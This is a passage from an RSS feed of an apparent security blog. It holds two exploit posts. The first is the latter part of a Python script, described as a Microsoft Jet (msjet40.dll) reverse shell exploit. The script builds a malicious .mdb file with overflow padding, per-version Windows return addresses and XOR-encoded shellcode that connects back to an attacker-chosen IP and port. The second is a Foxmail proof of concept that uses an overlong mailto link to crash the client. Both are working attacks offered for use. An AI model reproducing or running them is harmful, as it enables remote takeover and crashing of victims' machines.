&#34;\x65\x00\x72\x00\x10\x00\x50\x00\x61\x00\x72\x00\x65\x00\x6E\x00&#34;<br/>mdbBody += &#34;\x74\x00\x49\x00\x64\x00\x16\x00\x52\x00\x6D\x00\x74\x00\x49\x00&#34;<br/>mdbBody += &#34;\x6E\x00\x66\x00\x6F\x00\x4C\x00\x6F\x00\x6E\x00\x67\x00\x18\x00&#34;<br/>mdbBody += &#34;\x52\x00\x6D\x00\x74\x00\x49\x00\x6E\x00\x66\x00\x6F\x00\x53\x00&#34;<br/>mdbBody += &#34;\x68\x00\x6F\x00\x72\x00\x74\x00\x08\x00\x54\x00\x79\x00\x70\x00&#34;<br/>mdbBody += &#34;\x65\x00\x83\x07\x00\x00\x01\x00\x01\x02\x00\x01\xFF\xFF\x00\xFF&#34;<br/>mdbBody += &#34;\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF&#34;<br/>mdbBody += &#34;\x00\xFF\xFF\x00\x10\x06\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x81\x00\x00\x00\x00\x00\x83\x07\x00\x00\x00\x00\x01\xFF\xFF\x00&#34;<br/>mdbBody += &#34;\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\xFF&#34;<br/>mdbBody += &#34;\xFF\x00\xFF\xFF\x00\xFF\xFF\x00\x11\x06\x00\x00\x08\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\x00\x81\x00\x00\x00\x00\x00\x59\x06\x00\x00\x01\x00&#34;<br/>mdbBody += &#34;\x00\x00\x01\x00\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04&#34;<br/>mdbBody += &#34;\x04\x01\x00\x00\x00\x00\x59\x06\x00\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00\x00\xFF\xFF\xFF\xFF\x00\x00\x00\x00\x04\x04\x00\x00\x00&#34;<br/>mdbBody += &#34;\x00\x00&#34;<br/><br/># Body2<br/>mdbBody2&nbsp;&nbsp;= &#34;\x02\x01\xA9\x0E\x00\x00\x00\x00\x4F\x01\x00\x00\x59\x06\x00\x00&#34;<br/>mdbBody2 += &#34;\x34\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x53\x04\x00\x01\x00\x04\x00\x01&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x01\x00\x00\x00\x12\x06\x00\x00\x13\x06\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x11\x00\x00\x00\x00\x00\x00\x00\x04\x59\x06\x00\x00&#34;<br/>mdbBody2 += &#34;\x02\x00\x01\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x04\x00\x04\x00\x01\x59\x06\x00\x00\x03\x00\x01\x00\x00\x00\x09&#34;<br/>mdbBody2 += &#34;\x04\x00\x00\x13\x00\x00\x00\x00\x00\x00\x00\x01\x00\x04\x59\x06&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x00\x00\x00\x00\x00\x09\x04\x00\x00\x13\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x00\x04\x00\x09\x59\x06\x00\x00\x01\x00\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x00\x09\x04\x00\x00\x32\x00\x00\x00\x00\x00\x07\x00\xFE\x01\x06&#34;<br/>mdbBody2 += &#34;\x00\x41\x00\x43\x00\x4D\x00\x18\x00\x46\x00\x49\x00\x6E\x00\x68&#34;<br/>mdbBody2 += &#34;\x00\x65\x00\x72\x00\x69\x00\x74\x00\x61\x00\x62\x00\x6C\x00\x65&#34;<br/>mdbBody2 += &#34;\x00\x10\x00\x4F\x00\x62\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49&#34;<br/>mdbBody2 += &#34;\x00\x64\x00\x06\x00\x53\x00\x49\x00\x44\x00\x83\x07\x00\x00\x00&#34;<br/>mdbBody2 += &#34;\x00\x01\xFF\xFF\x00\xFF\xFF\x00\xFF\xFF\x09\xFF\xFF\x00\xFF\xFF&#34;<br/>mdbBody2 += &#34;\x00\xFF\xFF\x00\xFF\xFF\x04\xFF\xFF\x12\xFF\xFF\x00\x14\x06\x00&#34;<br/>mdbBody2 += &#34;\x00\x09\x00\x00\x00\x41\x00\x74\x00\x88\x00\x00\x00\x00\x00\x59&#34;<br/>mdbBody2 += &#34;\x06\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xFF\xFF\xFF\xFF&#34;<br/>mdbBody2 += &#34;\x00\x00\x00\x00\x04\x04\x00\x00\x00\x00\x00\x10\x00\x4F\x00\x62&#34;<br/>mdbBody2 += &#34;\x00\x6A\x00\x65\x00\x63\x00\x74\x00\x49\x00\x64\x00\xFF\xFF\x00&#34;;<br/><br/>ShellJump&nbsp;&nbsp;= &#34;\x14\x00&#34;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Expanded ID Parameter (20 bytes) to accommodate this code<br/>ShellJump += &#34;\x83\xC6\x08&#34;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Add ESI,8 (Pointer to our shellcode)<br/>ShellJump += &#34;\xFF\xE6&#34;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;# Call ESI (Execute Shellcode)<br/>ShellJump += &#34;\x90\x90\x90\x90&#34;<br/>ShellJump += &#34;\x90\x90\x90\x90&#34; # Not used<br/>ShellJump += &#34;\x90\x90\x90&#34;;<br/><br/>VulnerableParameter&nbsp;&nbsp;= &#34;\x18\x00\x50\x00&#34;<br/>VulnerableParameter += &#34;\x61\x00\x72\x00&#34;<br/>VulnerableParameter += &#34;\x65\x00\x6E\x00&#34;<br/>VulnerableParameter += &#34;\x74\x00\x49\x00&#34;<br/>VulnerableParameter += &#34;\x64\x00\x4E\x00&#34;<br/>VulnerableParameter += &#34;\x61\x00\x6D\x00&#34;<br/>VulnerableParameter += &#34;\x65\x00\x00\x01&#34; # 0100 will result in EDX pointing to a variable containing our MSAccess offset<br/>VulnerableParameter += &#34;\x04\x06\x00\x00&#34;<br/>VulnerableParameter += &#34;\x05\x90&#34;<br/><br/><br/><br/>if (len(sys.argv) != 5):<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;\nUsage: &#34; + sys.argv[0] + &#34; &lt;Attacker IP&gt; &lt;Attacker Port&gt; &lt;Output File&gt; &lt;System TYPE&gt;\n&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;##################################################################&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Southeast University Electrical Engineering&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<a href="http://www.friddy.cn" target="_blank" rel="external">http://www.friddy.cn</a>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;&nbsp;&nbsp; <br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;&nbsp;&nbsp;&nbsp;&nbsp;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&lt;System TYPE&gt;:&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;0 FOR Windows 2000 Service Pack 4 CHINESE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;1 FOR Windows XP&nbsp;&nbsp; Service Pack 2 CHINESE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;2 FOR Windows 2003 CHINESE&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Example:exploit.py 192.168.1.1 8888 attack.mdb 1&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;##################################################################&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;Microsoft Jet (msjet40.dll) Reverse Shell Exploit&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; #&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; coded by Friddy&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Based on the exploit written by S.Pearson&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;#&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;#&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; print &#34;##################################################################&#34;<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; sys.exit(0)<br/><br/># Addresses are compatible with Windows&nbsp;&nbsp;Service Pack X CHINESE Version<br/>sunny = int(sys.argv[4])<br/>if sunny == 0:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnAddress = 0x77F920E3 #Windows 2000 Service Pack 4 Server CHINESE<br/>if sunny == 1:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnAddress = 0x7C985A3B #Windows XP Service Pack 2 CHINESE<br/>if sunny == 2:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnAddress = 0x7FFA54CF #Windows 2003 CHINESE<br/>if sunny == 3:<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;ReturnAddress = 0x77FC9130 #Windows 2000 Service Pack 4 Professional CHINESE<br/><br/><br/><br/>i=0<br/>xorTable = [0xB5,0xAA,0x25,0x97]<br/>Shellcode&nbsp;&nbsp;= Shellcode_p1<br/><br/>ipAddress = sys.argv[1].split(&#34;.&#34;,4);<br/>port = struct.pack(&#34;h&#34;,int(sys.argv[2]));<br/><br/>while(i&lt;4):<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; Shellcode += chr(int(ipAddress[i]) ^ xorTable[3-i])<br/>&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp; i+=1;<br/><br/><br/><br/>Shellcode += &#34;\xf1\x4d&#34;<br/>Shellcode += chr(struct.unpack(&#34;B&#34;,port[1])[0] ^ 0xAA)<br/>Shellcode += chr(struct.unpack(&#34;B&#34;,port[0])[0] ^ 0xB5)<br/>Shellcode += Shellcode_p2<br/><br/><br/>mdb&nbsp;&nbsp;= mdbHeader<br/>mdb += &#34;\x41&#34; * 7968<br/>mdb += mdbBody<br/>mdb += ShellJump<br/>mdb += struct.pack(&#34;&lt;L&#34;,ReturnAddress)<br/>mdb += VulnerableParameter<br/>mdb += Shellcode + &#34;\x90&#34; * (3094 - len(Shellcode))<br/>mdb += mdbBody2<br/>mdb += &#34;\x00&#34; * (94208 -len(mdb))<br/><br/>fileOut = open(sys.argv[3],&#34;wb&#34;)<br/>fileOut.write(mdb)<br/>fileOut.close()<br/>]]></description>
		</item>
		
			<item>
			<link>http://www.friddy.cn/article.asp?id=5</link>
			<title><![CDATA[foxmail 0day POC]]></title>
			<author>root@friddy.cn(friddy)</author>
			<category><![CDATA[0day]]></category>
			<pubDate>Thu,11 Sep 2008 10:33:59 +0800</pubDate>
			<guid>http://www.friddy.cn/default.asp?id=5</guid>
		<description><![CDATA[<p>&lt;html&gt;<br minmax_bound="true" />
<br minmax_bound="true" />
&lt;body&gt;<br minmax_bound="true" />
&lt;P&gt;Author:friddy&nbsp; &nbsp;QQ:568623<br minmax_bound="true" />
&lt;P&gt;Result:Program Crash<br minmax_bound="true" />
&lt;BR&gt;<br minmax_bound="true" />
　&lt;A href=&quot;mailto:A%...............................................................................................................AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA.com&quot;&gt;ClickME&lt;/a&gt;<br minmax_bound="true" />
&gt;Clickme&lt;/A&gt;<br minmax_bound="true" />
&lt;/body&gt;<br minmax_bound="true" />
<br minmax_bound="true" />
&lt;/html&gt;<br minmax_bound="true" />
&nbsp;</p>]]></description>
		</item>
		
</channel>
</rss>
